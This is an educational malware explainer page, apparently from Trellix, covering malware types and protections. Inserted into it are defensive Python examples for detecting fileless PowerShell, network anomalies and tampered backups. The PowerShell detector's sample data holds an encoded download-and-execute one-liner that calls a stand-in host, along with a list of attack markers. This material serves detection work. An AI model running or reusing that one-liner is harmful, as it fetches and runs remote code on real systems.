What Is Malware?

Short for “malicious software,” malware is any program, script, or firmware code designed to harm or exploit a programmable device, server, or network. The harm a given sample is built to cause can take many forms, including:

  • Denial of access to systems or data

  • Destruction or theft of data

  • Theft of money or financial credentials

  • Extortion, most visibly through ransomware

  • Hijacking of computing resources

  • Spreading misinformation or propagating further malware


Purpose and intent of malware

The goal of malware is to invade or corrupt a computer network, causing havoc and stealing information or resources. Malware attacks are driven by various motives, but they generally intend to reward the perpetrator at the victim's expense.

Common malicious purposes include:

  • Financial Gain. Malware is often designed for profit. This includes holding devices, data, or networks hostage for money (ransomware), stealing financial assets, selling intellectual property on the dark web, and generating revenue through click fraud or adware.

  • Data Theft and Espionage. Malware seeks to leak private information, gain unauthorized access to data or systems and steal login credentials, personal identification numbers, bank details, or passwords. Governments and malicious hackers use it to steal personal, financial, or business information.

  • System Disruption and Sabotage. Malware is used to disrupt normal operations, lock up networks and PCs so they are unusable, or destroy systems and the infrastructure they run on. Historically, malware like Stuxnet has been used for sabotage driven by political objectives, targeting industrial control systems.

  • Resource Theft. Malicious software is used to hijack computing resources, turning infected systems into "zombie computers" or botnets used to send email spam, host contraband data, or engage in distributed denial-of-service (DDoS) attacks. Cryptojacking is a common tactic to steal computing power for cryptocurrency mining.

Types of malware

Researchers classify malicious software into numerous subtypes. Broadly, software can be categorized as goodware, grayware, or malware, with grayware being unwanted applications like spyware or adware that lack sufficient consensus or metrics to be fully classified as malware.

Common types of malware include:

  • Viruses. Malicious code that embeds itself within another seemingly harmless program or file (like an executable or boot sector). Viruses spread when the infected program is run or the disk is booted.

  • Worms. Standalone malicious software that actively transmits and copies itself over a network to infect other computers without needing to attach to a host program or requiring user interaction to spread.

  • Trojan Horse (Trojan). Malware that disguises itself as a regular, benign, or useful program to trick the victim into installing it. Once started, it activates a hidden destructive function, often creating a backdoor or installing additional malware.

  • Ransomware. Software that prevents a user from accessing their files or locks an entire computer system until a ransom is paid. Crypto ransomware encrypts files, while locker ransomware only locks the system without encrypting data.

  • Spyware. Secretly monitors user activities, such as web browsing and keystrokes, and collects sensitive information (passwords, credit card numbers) without the user's knowledge to transmit it back to an attacker.

  • Adware. Installs without consent to display unwanted advertisements, often in pop-up form, to make money through clicks. Some dangerous types can install other software or redirect browsers to malicious sites.

  • Rootkits. Software packages designed to conceal malicious software by modifying the host operating system so that the malware remains hidden from the user and from security tools, sometimes for years. Rootkits typically run with administrator- or kernel-level privileges, which is what lets them hide processes, files, and network connections; that privileged foothold is also what makes them hard to remove.

  • Fileless Malware. A type of attack that runs directly within the computer's memory instead of relying on files on the hard drive. It often uses existing system tools like PowerShell or exploits vulnerabilities in legitimate software to inject malicious code. This makes it difficult to detect with traditional antivirus programs.

  • Cryptojacking (Cryptomining Malware). Hijacks a device's computing power to secretly mine cryptocurrency, causing performance slowdowns and taxing system resources.

  • Droppers. A subtype of Trojan whose only job is to place other malware on the infected system while evading detection. A dropper carries its payload inside itself, whereas a downloader fetches the payload from a remote server after it runs.

  • Scareware. Uses social engineering tactics to frighten or shock a user into believing their system is infected or vulnerable, coercing them into purchasing unnecessary or dangerous software to remove the fake threat.
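The fileless-malware entry above notes that attackers lean on built-in tools like PowerShell, which is why process command lines are one of the better places to look for it. The Python below is an added example, not code from this page or from Trellix: it decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE text) and flags command lines that combine it with download-and-execute markers or an Office parent process. The host names, events, payload and the 203.0.113.5 address are constructed for the example.

```python
import base64
import re

# Hypothetical payload and events, constructed for this example only.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
# PowerShell's -EncodedCommand takes base64 of the UTF-16LE command text.
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Sample process-creation events, shaped loosely like Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"host": "WS-041", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"},
    {"host": "WS-017", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"host": "SRV-02", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Substrings that frequently appear in download-and-execute one-liners.
MARKERS = ("iex ", "invoke-expression", "downloadstring", "downloadfile",
           "frombase64string", "-w hidden", "-windowstyle hidden", "bypass")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # truncated or not really base64; nothing to decode


def score_event(event):
    """List the reasons an event looks like fileless tradecraft (empty list = nothing seen)."""
    reasons = []
    text = event["cmdline"].lower()
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        reasons.append("encoded command")
        text += " " + decoded.lower()  # inspect the decoded script, not just the wrapper
    reasons += [f"marker:{m.strip()}" for m in MARKERS if m in text]
    if event["parent"].lower() in OFFICE_PARENTS and event["image"].lower() in SCRIPT_HOSTS:
        reasons.append(f"{event['parent']} spawned {event['image']}")
    return reasons


def find_fileless_candidates(events):
    """(host, reasons) for every event that produced at least one reason."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            hits.append((event["host"], reasons))
    return hits


if __name__ == "__main__":
    for host, reasons in find_fileless_candidates(SAMPLE_EVENTS):
        print(host, "->", "; ".join(reasons))
```

Only the second event is reported: an Office process spawning a hidden, encoded PowerShell that downloads and executes a script. The benign administrative command on WS-041 produces no reasons, which is the point of looking at combinations rather than at PowerShell use alone.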


Malware infections can happen on any device or operating system, including Windows, Mac, iOS, and Android systems, as well as IoT devices. In 2024, the total amount of money received by ransomware actors alone amounted to $813 million, according to recent research.


Best practices for malware protection

Below are the primary strategies that individuals and organizations can implement for better malware protection.

Anti-malware software and advanced detection tools

  • Install and Update Anti-malware/Antivirus Software. Anti-malware, sometimes called antivirus software, blocks and removes many types of malware and is usually the first tool used to clean an infected computer or personal device. Choose a solution that updates its detection content continuously so it recognizes the widest range of threats, and keep its real-time protection enabled.

  • Employ Advanced Detection and Response Solutions. Today's standard antivirus products may not be enough to protect against advanced cyberthreats. Solutions that continually monitor and detect malware that has bypassed perimeter defenses are crucial.

    • Extended Detection and Response (XDR). XDR solutions integrate security tools across various layers—endpoints, email, identities, cloud apps, and data—to provide a holistic view for faster identification and disruption of sophisticated attacks.

    • Endpoint Detection and Response (EDR). EDR solutions monitor endpoint devices like smartphones, laptops, and servers for suspicious activity and automatically respond to detected malware.

    • Security Information and Event Management (SIEM). Next-gen SIEM platforms centralize and aggregate alerts from multiple security tools, making it easier to spot subtle signs of malware activity, such as processes using more bandwidth than normal or devices communicating with unknown servers.

    • Intrusion Detection/Prevention Systems (IDS/IPS). An IDS monitors network traffic for patterns that might indicate an attack and raises alerts; an IPS sits inline and can also block the offending traffic.

    • Network Detection and Response (NDR). NDR solutions continuously monitor network traffic for suspicious patterns, such as lateral movement or beaconing to command-and-control servers, and alert administrators to potential threats.

    • Email Security. Email security solutions analyze URLs and attachments to block suspicious emails. 
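As an added example of the SIEM-style correlation the list describes (not code from this page or from any Trellix product), the Python below runs three simple rules over constructed flow records: devices talking to destinations outside an allow-list, a process sending far more than its own median, and connections to one destination at suspiciously regular intervals (beaconing, which goes a step beyond what the list names). The allow-list, host names, process names and addresses are assumptions made for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Assumed allow-list of sanctioned destinations (hypothetical addresses).
KNOWN_SERVERS = {"10.0.0.5", "10.0.0.6", "203.0.113.10"}
BANDWIDTH_MULTIPLIER = 10     # flag a flow sending > 10x the process's median
MIN_SAMPLES = 3               # a baseline needs a few flows before it means anything
BEACON_MIN_CONNECTIONS = 4
BEACON_MAX_JITTER = 0.10      # stdev/mean of the gaps between connections

# Constructed flow records: (timestamp, host, process, destination, bytes_out).
SAMPLE_FLOWS = [
    ("2024-05-01T09:00:00", "WS-041", "outlook.exe", "10.0.0.5", 120_000),
    ("2024-05-01T09:05:00", "WS-041", "outlook.exe", "10.0.0.5", 130_000),
    ("2024-05-01T01:00:00", "SRV-02", "backup.exe", "10.0.0.6", 2_000_000),
    ("2024-05-02T01:00:00", "SRV-02", "backup.exe", "10.0.0.6", 2_100_000),
    ("2024-05-03T01:00:00", "SRV-02", "backup.exe", "10.0.0.6", 1_900_000),
    ("2024-05-01T09:10:00", "WS-023", "svchost.exe", "10.0.0.5", 50_000),
    ("2024-05-01T09:20:00", "WS-023", "svchost.exe", "10.0.0.5", 48_000),
    ("2024-05-01T09:30:00", "WS-023", "svchost.exe", "10.0.0.5", 52_000),
    ("2024-05-01T09:40:00", "WS-023", "svchost.exe", "198.51.100.7", 40_000_000),
    ("2024-05-01T09:00:00", "WS-017", "updater.exe", "198.51.100.7", 1_200),
    ("2024-05-01T09:01:00", "WS-017", "updater.exe", "198.51.100.7", 1_200),
    ("2024-05-01T09:02:00", "WS-017", "updater.exe", "198.51.100.7", 1_200),
    ("2024-05-01T09:03:00", "WS-017", "updater.exe", "198.51.100.7", 1_200),
    ("2024-05-01T09:04:00", "WS-017", "updater.exe", "198.51.100.7", 1_200),
]


def unknown_destinations(flows, known=KNOWN_SERVERS):
    """(host, process, destination) for traffic to servers outside the allow-list."""
    hits = {(host, proc, dst) for _, host, proc, dst, _ in flows if dst not in known}
    return sorted(hits)


def bandwidth_outliers(flows, multiplier=BANDWIDTH_MULTIPLIER):
    """Flows whose bytes_out dwarf the median of all flows by the same process."""
    by_proc = defaultdict(list)
    for flow in flows:
        by_proc[flow[2]].append(flow[4])
    hits = []
    for _, host, proc, dst, nbytes in flows:
        samples = by_proc[proc]
        if len(samples) < MIN_SAMPLES:
            continue
        baseline = statistics.median(samples)
        if nbytes > multiplier * baseline:
            hits.append((host, proc, dst, nbytes, baseline))
    return hits


def beacons(flows):
    """(host, process, destination, mean gap) contacted at near-constant intervals."""
    stamps = defaultdict(list)
    for ts, host, proc, dst, _ in flows:
        stamps[(host, proc, dst)].append(datetime.fromisoformat(ts))
    hits = []
    for key, times in stamps.items():
        if len(times) < BEACON_MIN_CONNECTIONS:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        # Low jitter relative to the mean gap is the classic C2 heartbeat signature.
        if mean > 0 and statistics.pstdev(gaps) / mean <= BEACON_MAX_JITTER:
            hits.append((*key, mean))
    return hits


if __name__ == "__main__":
    print("unknown destinations:", unknown_destinations(SAMPLE_FLOWS))
    print("bandwidth outliers:", bandwidth_outliers(SAMPLE_FLOWS))
    print("beacons:", beacons(SAMPLE_FLOWS))
```

The three rules overlap on purpose: a single 40 MB transfer from svchost.exe to an unknown address trips two of them, and the one-minute heartbeat from updater.exe trips two others. In a real SIEM the median baseline would be learned per host and process over days rather than from a handful of records, and the allow-list would come from asset inventory rather than a constant.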

Network and system configuration defenses

Security measures at the network and system level can limit a malware infection's entry and spread.

  • Firewalls and Network Segmentation. Firewalls decide which traffic to allow or block based on security rules. You should use firewall protection to filter network traffic, including traffic entering and exiting the network. Furthermore, network segmentation involves structuring a network into smaller networks and limiting the traffic flow between them to legitimate communication, which hinders malware's ability to replicate across the wider network.

  • Sandboxing. This security model confines applications within a controlled environment, restricting their operations and isolating them from other applications and system resources. Browser sandboxing isolates web processes to prevent malware and exploits. More broadly, sandboxing can block an attack by isolating and confining malware (like a malicious email attachment) to a protected environment so IT teams can observe its behavior without risking network infection.

  • Employ Behavior-based Analytics Software. This uses artificial intelligence and machine learning to profile normal user behavior and detect abnormal use of applications.

  • Keep Software Updated and Patched. Regularly downloading and installing system updates and software patches as soon as they are available helps minimize security vulnerabilities that cybercriminals might exploit.

  • Adopt a Zero Trust Model. A Zero Trust network architecture evaluates all users and devices for risk before permitting access to resources. This model implements principles like least privilege and network microsegmentation, which help ensure that if malware gets onto the network, its lateral movement is limited.

  • Disable Unnecessary Features. Disable administrative tools, browser plug-ins, and macros that are not needed. Macros in applications like Microsoft Word are executable code (VBA), so a document that asks the reader to "enable content" is a common way to get malware running; block macros in files that arrived from the internet unless there is a specific business need for them.

Data management and recovery

  • Back Up Data Frequently. Maintaining updated backups of sensitive data and system images is a crucial preemptive mitigation step. These backups should ideally be kept offline or disconnected from the network to protect them from malware, as some malware, especially ransomware, may seek out and delete online backups. Organizations should also regularly test backups to ensure they function properly.

  • Create an Incident Response Plan. Developing a detailed, structured incident response plan ahead of time provides steps to take in different attack scenarios, helping cybersecurity teams manage and mitigate the impact of malware infections more quickly and ensure business continuity.
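Testing backups, as the list above recommends, can be automated. This Python example is added here and is not code from the page: it records a SHA-256 manifest of the source tree and then verifies a backup copy against it, reporting files that are missing, modified, or unexpected (the last being how a dropped ransom note would show up). The directory layout and file contents are constructed in a temporary directory for the demonstration.

```python
import hashlib
import tempfile
from pathlib import Path


def build_manifest(root):
    """Map each file's path (relative to root) to its SHA-256 hex digest."""
    root = Path(root)
    manifest = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        manifest[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def verify_backup(backup_root, manifest):
    """Compare a backup (or restored) tree against the manifest; return the problems found."""
    actual = build_manifest(backup_root)
    problems = []
    for rel, digest in manifest.items():
        if rel not in actual:
            problems.append(("missing", rel))
        elif actual[rel] != digest:
            problems.append(("modified", rel))
    for rel in actual:
        if rel not in manifest:
            problems.append(("unexpected", rel))
    return sorted(problems)


def demo():
    """Constructed scenario: a source tree, a faithful backup, and a tampered backup."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp)
        src, good, bad = tmp / "src", tmp / "backup_good", tmp / "backup_bad"
        for d in (src / "docs", good / "docs", bad / "docs"):
            d.mkdir(parents=True)
        files = {"docs/plan.txt": b"quarterly plan", "ledger.csv": b"id,amount\n1,42\n"}
        for rel, data in files.items():
            for tree in (src, good, bad):
                (tree / rel).write_bytes(data)
        manifest = build_manifest(src)  # taken when the backup was made
        # Simulate ransomware reaching the "bad" backup: one file overwritten (stand-in
        # for encryption), one deleted, one ransom note dropped.
        (bad / "ledger.csv").write_bytes(b"\x00garbage\x00")
        (bad / "docs" / "plan.txt").unlink()
        (bad / "README_RESTORE.txt").write_bytes(b"pay up")
        return verify_backup(good, manifest), verify_backup(bad, manifest)


if __name__ == "__main__":
    good_result, bad_result = demo()
    print("good backup:", good_result or "clean")
    print("bad backup:", bad_result)
```

Keep the manifest with the offline copy, not only on the live network: if an attacker can rewrite both the backup and the manifest, the comparison proves nothing. Hash checks also only show that the bytes survived; an actual restore onto a spare machine is still the test that matters.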

User training

User training on safe internet and social media practices is also recommended. Users benefit from regular informational updates on the latest malware threats, as well as reminders on security practices. 

IT employees can improve their security skills by attending a Trellix webinar and reviewing Trellix Threat Center reports.

Malware FAQ

Malware is malicious software, whether a program, script, or firmware code, intentionally created to exploit or cause damage to a programmable device, network, or server.

The goal of malware is to invade or corrupt a computer network, causing havoc and stealing information or resources. Typical reasons include financial gain, data theft and espionage, system disruption and sabotage, and resource theft.

Common types of malware include:
  • Viruses
  • Worms
  • Trojan horses
  • Ransomware
  • Spyware
  • Adware
  • Rootkits
  • Fileless malware
  • Cryptojacking
  • Droppers
  • Scareware

To protect against malware, you should
  • Deploy anti-malware software and advanced detection tools
  • Take security measures at the network and system level
  • Practice data management and recovery
  • Train users on safe internet and social media practices

Malware resources

WHITE PAPER
Threat Hunting and Detection Engineering

Get a comprehensive framework for integrating threat intelligence, proactive hunting methodologies, and advanced detection engineering into modern security operations.

DATA SHEET
Trellix Insights

Proactively predict and prioritize security threats. Deliver threat detections and map them to endpoints, campaigns, and more to help prevent attacks.

BLOGS
Trellix Research Blogs

We analyze cybersecurity threats, emerging vulnerabilities, and defense strategies to help you stay ahead of cyber risks.

Reviewed by Ryan Delany, who is a Senior Product Manager responsible for the Threat Intelligence product and service portfolio at Trellix, with over two decades of cybersecurity experience at leading companies, including Trend Micro, FireEye, and Cisco.
